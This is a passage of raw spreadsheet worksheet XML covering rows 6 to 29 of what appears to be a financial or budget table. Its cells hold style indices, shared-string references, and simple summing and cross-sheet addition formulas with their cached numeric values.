      <c r="F6" s="194"/>
      <c r="G6" s="194"/>
      <c r="H6" s="194">
        <f>G6+'r'!H6</f>
        <v>0</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>276349.96</v>
      </c>
      <c r="J6" s="194"/>
      <c r="K6" s="194">
        <f>J6+'r'!K6</f>
        <v>0</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>262197.7</v>
      </c>
      <c r="M6" s="194"/>
      <c r="N6" s="320"/>
      <c r="O6" s="191"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R6" s="321"/>
      <c r="S6" s="321"/>
      <c r="T6" s="238"/>
      <c r="U6" s="233"/>
      <c r="V6" s="233"/>
      <c r="W6" s="238"/>
      <c r="X6" s="233"/>
      <c r="Y6" s="233"/>
      <c r="Z6" s="233"/>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>234</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194"/>
      <c r="G7" s="194"/>
      <c r="H7" s="194">
        <f>G7+'r'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194"/>
      <c r="K7" s="194">
        <f>J7+'r'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194"/>
      <c r="N7" s="320"/>
      <c r="O7" s="191"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R7" s="238"/>
      <c r="S7" s="245"/>
      <c r="T7" s="238"/>
      <c r="U7" s="233"/>
      <c r="V7" s="233"/>
      <c r="W7" s="238"/>
      <c r="X7" s="233"/>
      <c r="Y7" s="233"/>
      <c r="Z7" s="233"/>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194"/>
      <c r="G8" s="194"/>
      <c r="H8" s="194">
        <f>G8+'r'!H8</f>
        <v>0</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>525536.99</v>
      </c>
      <c r="J8" s="194"/>
      <c r="K8" s="194">
        <f>J8+'r'!K8</f>
        <v>0</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>507744.71</v>
      </c>
      <c r="M8" s="194"/>
      <c r="N8" s="320"/>
      <c r="O8" s="191"/>
      <c r="P8" s="244"/>
      <c r="Q8" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R8" s="245"/>
      <c r="S8" s="245"/>
      <c r="T8" s="238"/>
      <c r="U8" s="233"/>
      <c r="V8" s="233"/>
      <c r="W8" s="238"/>
      <c r="X8" s="233"/>
      <c r="Y8" s="233"/>
      <c r="Z8" s="233"/>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194"/>
      <c r="G9" s="194"/>
      <c r="H9" s="194">
        <f>G9+'r'!H9</f>
        <v>0</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4135388.88</v>
      </c>
      <c r="J9" s="194"/>
      <c r="K9" s="194">
        <f>J9+'r'!K9</f>
        <v>0</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4097478.811</v>
      </c>
      <c r="M9" s="194"/>
      <c r="N9" s="320"/>
      <c r="O9" s="191"/>
      <c r="P9" s="213" t="s">
        <v>313</v>
      </c>
      <c r="Q9" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R9" s="238"/>
      <c r="S9" s="238"/>
      <c r="T9" s="238"/>
      <c r="U9" s="233"/>
      <c r="V9" s="233"/>
      <c r="W9" s="238"/>
      <c r="X9" s="233"/>
      <c r="Y9" s="233"/>
      <c r="Z9" s="233"/>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>240</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194"/>
      <c r="G10" s="194"/>
      <c r="H10" s="194">
        <f>G10+'r'!H10</f>
        <v>0</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>917527.17</v>
      </c>
      <c r="J10" s="194"/>
      <c r="K10" s="194">
        <f>J10+'r'!K10</f>
        <v>0</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>897228.72</v>
      </c>
      <c r="M10" s="194"/>
      <c r="N10" s="320"/>
      <c r="O10" s="191"/>
      <c r="P10" s="215"/>
      <c r="Q10" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R10" s="245"/>
      <c r="S10" s="245"/>
      <c r="T10" s="238"/>
      <c r="U10" s="233"/>
      <c r="V10" s="233"/>
      <c r="W10" s="238"/>
      <c r="X10" s="233"/>
      <c r="Y10" s="233"/>
      <c r="Z10" s="233"/>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="193" t="s">
        <v>242</v>
      </c>
      <c r="D11" s="193"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194"/>
      <c r="G11" s="194"/>
      <c r="H11" s="194">
        <f>G11+'r'!H11</f>
        <v>0</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>0</v>
      </c>
      <c r="J11" s="194"/>
      <c r="K11" s="194">
        <f>J11+'r'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194"/>
      <c r="N11" s="320"/>
      <c r="O11" s="191"/>
      <c r="P11" s="214"/>
      <c r="Q11" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R11" s="238"/>
      <c r="S11" s="238"/>
      <c r="T11" s="238"/>
      <c r="U11" s="233"/>
      <c r="V11" s="233"/>
      <c r="W11" s="238"/>
      <c r="X11" s="233"/>
      <c r="Y11" s="233"/>
      <c r="Z11" s="233"/>
    </row>
    <row r="12" ht="15.75" customHeight="1" spans="1:26">
      <c r="A12" s="191"/>
      <c r="B12" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C12" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D12" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E12" s="194">
        <f>E22+E32+E42+E52+E62</f>
        <v>560000</v>
      </c>
      <c r="F12" s="194">
        <f>F22+F32+F42+F52+F62+F72+F79+F86</f>
        <v>0</v>
      </c>
      <c r="G12" s="194">
        <f>G22+G32+G42+G52+G62</f>
        <v>0</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'r'!H12</f>
        <v>0</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>4942391.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J72+J79+J86</f>
        <v>0</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'r'!K12</f>
        <v>0</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5029106.376</v>
      </c>
      <c r="M12" s="194">
        <f>M28+M38+M48+M58+M68+M78+M85+M92</f>
        <v>0</v>
      </c>
      <c r="N12" s="319">
        <f>M12/439000*100</f>
        <v>0</v>
      </c>
      <c r="O12" s="191"/>
      <c r="P12" s="213" t="s">
        <v>310</v>
      </c>
      <c r="Q12" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R12" s="238"/>
      <c r="S12" s="238"/>
      <c r="T12" s="238"/>
      <c r="U12" s="233"/>
      <c r="V12" s="233"/>
      <c r="W12" s="238"/>
      <c r="X12" s="233"/>
      <c r="Y12" s="233"/>
      <c r="Z12" s="233"/>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E73+E80+E87</f>
        <v>0</v>
      </c>
      <c r="F13" s="194"/>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G73+G80+G87</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'r'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194"/>
      <c r="K13" s="194">
        <f>J13+'r'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194"/>
      <c r="N13" s="320"/>
      <c r="O13" s="191"/>
      <c r="P13" s="215"/>
      <c r="Q13" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R13" s="238"/>
      <c r="S13" s="238"/>
      <c r="T13" s="238"/>
      <c r="U13" s="233"/>
      <c r="V13" s="233"/>
      <c r="W13" s="238"/>
      <c r="X13" s="233"/>
      <c r="Y13" s="233"/>
      <c r="Z13" s="233"/>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f t="shared" ref="E14:J14" si="0">E24+E34+E44+E54+E64</f>
        <v>0</v>
      </c>
      <c r="F14" s="194"/>
      <c r="G14" s="194">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'r'!H14</f>
        <v>0</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>964543.676</v>
      </c>
      <c r="J14" s="194">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'r'!K14</f>
        <v>0</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1792944.106</v>
      </c>
      <c r="M14" s="194"/>
      <c r="N14" s="320"/>
      <c r="O14" s="191"/>
      <c r="P14" s="214"/>
      <c r="Q14" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R14" s="238"/>
      <c r="S14" s="238"/>
      <c r="T14" s="322"/>
      <c r="U14" s="233"/>
      <c r="V14" s="233"/>
      <c r="W14" s="238"/>
      <c r="X14" s="233"/>
      <c r="Y14" s="233"/>
      <c r="Z14" s="233"/>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f t="shared" ref="E15:J15" si="1">E25+E35+E45+E55+E65</f>
        <v>0</v>
      </c>
      <c r="F15" s="194"/>
      <c r="G15" s="194">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'r'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'r'!K15</f>
        <v>0</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>114756.5</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="320"/>
      <c r="O15" s="191"/>
      <c r="P15" s="213" t="s">
        <v>314</v>
      </c>
      <c r="Q15" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R15" s="245"/>
      <c r="S15" s="245"/>
      <c r="T15" s="321"/>
      <c r="U15" s="233"/>
      <c r="V15" s="233"/>
      <c r="W15" s="238"/>
      <c r="X15" s="233"/>
      <c r="Y15" s="233"/>
      <c r="Z15" s="233"/>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f t="shared" ref="E16:J16" si="2">E26+E36+E46+E56+E66+E74+E81+E88</f>
        <v>700000</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'r'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'r'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="320"/>
      <c r="O16" s="191"/>
      <c r="P16" s="214"/>
      <c r="Q16" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R16" s="245"/>
      <c r="S16" s="245"/>
      <c r="T16" s="321"/>
      <c r="U16" s="233"/>
      <c r="V16" s="233"/>
      <c r="W16" s="238"/>
      <c r="X16" s="233"/>
      <c r="Y16" s="233"/>
      <c r="Z16" s="233"/>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f t="shared" ref="E17:J17" si="3">E27+E37+E47+E57+E67+E75+E82+E89</f>
        <v>700000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'r'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'r'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="320"/>
      <c r="O17" s="191"/>
      <c r="P17" s="213" t="s">
        <v>315</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>316</v>
      </c>
      <c r="R17" s="245"/>
      <c r="S17" s="245"/>
      <c r="T17" s="321"/>
      <c r="U17" s="233"/>
      <c r="V17" s="233"/>
      <c r="W17" s="238"/>
      <c r="X17" s="233"/>
      <c r="Y17" s="233"/>
      <c r="Z17" s="233"/>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f t="shared" ref="E18:J18" si="4">E28+E38+E48+E58+E68+E76+E83+E90</f>
        <v>318000</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'r'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'r'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="320"/>
      <c r="O18" s="191"/>
      <c r="P18" s="215"/>
      <c r="Q18" s="193" t="s">
        <v>317</v>
      </c>
      <c r="R18" s="245"/>
      <c r="S18" s="245"/>
      <c r="T18" s="321"/>
      <c r="U18" s="233"/>
      <c r="V18" s="233"/>
      <c r="W18" s="238"/>
      <c r="X18" s="233"/>
      <c r="Y18" s="233"/>
      <c r="Z18" s="233"/>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f t="shared" ref="E19:J19" si="5">E29+E39+E49+E59+E69+E77+E84+E91</f>
        <v>382000</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'r'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'r'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="320"/>
      <c r="O19" s="191"/>
      <c r="P19" s="215"/>
      <c r="Q19" s="193" t="s">
        <v>318</v>
      </c>
      <c r="R19" s="245"/>
      <c r="S19" s="245"/>
      <c r="T19" s="321"/>
      <c r="U19" s="233"/>
      <c r="V19" s="233"/>
      <c r="W19" s="238"/>
      <c r="X19" s="233"/>
      <c r="Y19" s="233"/>
      <c r="Z19" s="233"/>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f t="shared" ref="E20:J20" si="6">E30+E40+E50+E60+E70</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'r'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'r'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="320"/>
      <c r="O20" s="191"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R20" s="323"/>
      <c r="S20" s="323"/>
      <c r="T20" s="238"/>
      <c r="U20" s="233"/>
      <c r="V20" s="233"/>
      <c r="W20" s="238"/>
      <c r="X20" s="233"/>
      <c r="Y20" s="233"/>
      <c r="Z20" s="233"/>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>312</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>123000</v>
      </c>
      <c r="F21" s="194"/>
      <c r="G21" s="194"/>
      <c r="H21" s="194">
        <f>G21+'r'!H21</f>
        <v>0</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2109438</v>
      </c>
      <c r="J21" s="194"/>
      <c r="K21" s="194">
        <f>J21+'r'!K21</f>
        <v>0</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2066454</v>
      </c>
      <c r="M21" s="194"/>
      <c r="N21" s="320">
        <f>M21/47000*100</f>
        <v>0</v>
      </c>
      <c r="O21" s="191"/>
      <c r="P21" s="214"/>
      <c r="Q21" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R21" s="238"/>
      <c r="S21" s="238"/>
      <c r="T21" s="233"/>
      <c r="U21" s="233"/>
      <c r="V21" s="233"/>
      <c r="W21" s="238"/>
      <c r="X21" s="233"/>
      <c r="Y21" s="233"/>
      <c r="Z21" s="233"/>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>131000</v>
      </c>
      <c r="F22" s="194"/>
      <c r="G22" s="194"/>
      <c r="H22" s="194">
        <f>G22+'r'!H22</f>
        <v>0</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2030981</v>
      </c>
      <c r="J22" s="194"/>
      <c r="K22" s="194">
        <f>J22+'r'!K22</f>
        <v>0</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1891461.38</v>
      </c>
      <c r="M22" s="194"/>
      <c r="N22" s="320">
        <f>M22/55000*100</f>
        <v>0</v>
      </c>
      <c r="O22" s="191"/>
      <c r="P22" s="218" t="s">
        <v>319</v>
      </c>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="238"/>
      <c r="S22" s="238"/>
      <c r="T22" s="233"/>
      <c r="U22" s="233"/>
      <c r="V22" s="233"/>
      <c r="W22" s="238"/>
      <c r="X22" s="233"/>
      <c r="Y22" s="233"/>
      <c r="Z22" s="233"/>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194"/>
      <c r="G23" s="194"/>
      <c r="H23" s="194">
        <f>G23+'r'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194"/>
      <c r="K23" s="194">
        <f>J23+'r'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194"/>
      <c r="N23" s="320"/>
      <c r="O23" s="191"/>
      <c r="P23" s="219"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="238"/>
      <c r="S23" s="238"/>
      <c r="T23" s="233"/>
      <c r="U23" s="233"/>
      <c r="V23" s="233"/>
      <c r="W23" s="238"/>
      <c r="X23" s="233"/>
      <c r="Y23" s="233"/>
      <c r="Z23" s="233"/>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194"/>
      <c r="G24" s="194"/>
      <c r="H24" s="194">
        <f>G24+'r'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194"/>
      <c r="K24" s="194">
        <f>J24+'r'!K24</f>
        <v>0</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>279826.53</v>
      </c>
      <c r="M24" s="194"/>
      <c r="N24" s="320"/>
      <c r="O24" s="191"/>
      <c r="P24" s="191" t="s">
        <v>320</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="322"/>
      <c r="S24" s="238"/>
      <c r="T24" s="233"/>
      <c r="U24" s="233"/>
      <c r="V24" s="233"/>
      <c r="W24" s="238"/>
      <c r="X24" s="233"/>
      <c r="Y24" s="233"/>
      <c r="Z24" s="245"/>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194"/>
      <c r="H25" s="194">
        <f>G25+'r'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194"/>
      <c r="K25" s="194">
        <f>J25+'r'!K25</f>
        <v>0</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79320.85</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="320"/>
      <c r="O25" s="324"/>
      <c r="P25" s="191" t="s">
        <v>321</v>
      </c>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="245"/>
      <c r="S25" s="245"/>
      <c r="T25" s="245"/>
      <c r="U25" s="245"/>
      <c r="V25" s="238"/>
      <c r="W25" s="238"/>
      <c r="X25" s="233"/>
      <c r="Y25" s="233"/>
      <c r="Z25" s="245"/>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194">
        <f>E27+E30</f>
        <v>122000</v>
      </c>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'r'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'r'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="320"/>
      <c r="O26" s="222" t="s">
        <v>264</v>
      </c>
      <c r="P26" s="191" t="s">
        <v>313</v>
      </c>
      <c r="Q26" s="191"/>
      <c r="R26" s="245"/>
      <c r="S26" s="323"/>
      <c r="T26" s="238"/>
      <c r="U26" s="322"/>
      <c r="V26" s="233"/>
      <c r="W26" s="238"/>
      <c r="X26" s="233"/>
      <c r="Y26" s="233"/>
      <c r="Z26" s="245"/>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <f>SUM(E28:E29)</f>
        <v>122000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'r'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'r'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="320"/>
      <c r="O27" s="222"/>
      <c r="P27" s="223" t="s">
        <v>312</v>
      </c>
      <c r="Q27" s="224"/>
      <c r="R27" s="245"/>
      <c r="S27" s="323"/>
      <c r="T27" s="238"/>
      <c r="U27" s="238"/>
      <c r="V27" s="233"/>
      <c r="W27" s="238"/>
      <c r="X27" s="233"/>
      <c r="Y27" s="233"/>
      <c r="Z27" s="245"/>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194">
        <v>64000</v>
      </c>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'r'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'r'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="320"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>314</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="245"/>
      <c r="S28" s="240"/>
      <c r="T28" s="238"/>
      <c r="U28" s="238"/>
      <c r="V28" s="238"/>
      <c r="W28" s="238"/>
      <c r="X28" s="238"/>
      <c r="Y28" s="238"/>
      <c r="Z28" s="233"/>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194">
        <v>58000</v>
      </c>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'r'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'r'!K29</f>
        <v>0</v>
      </c>
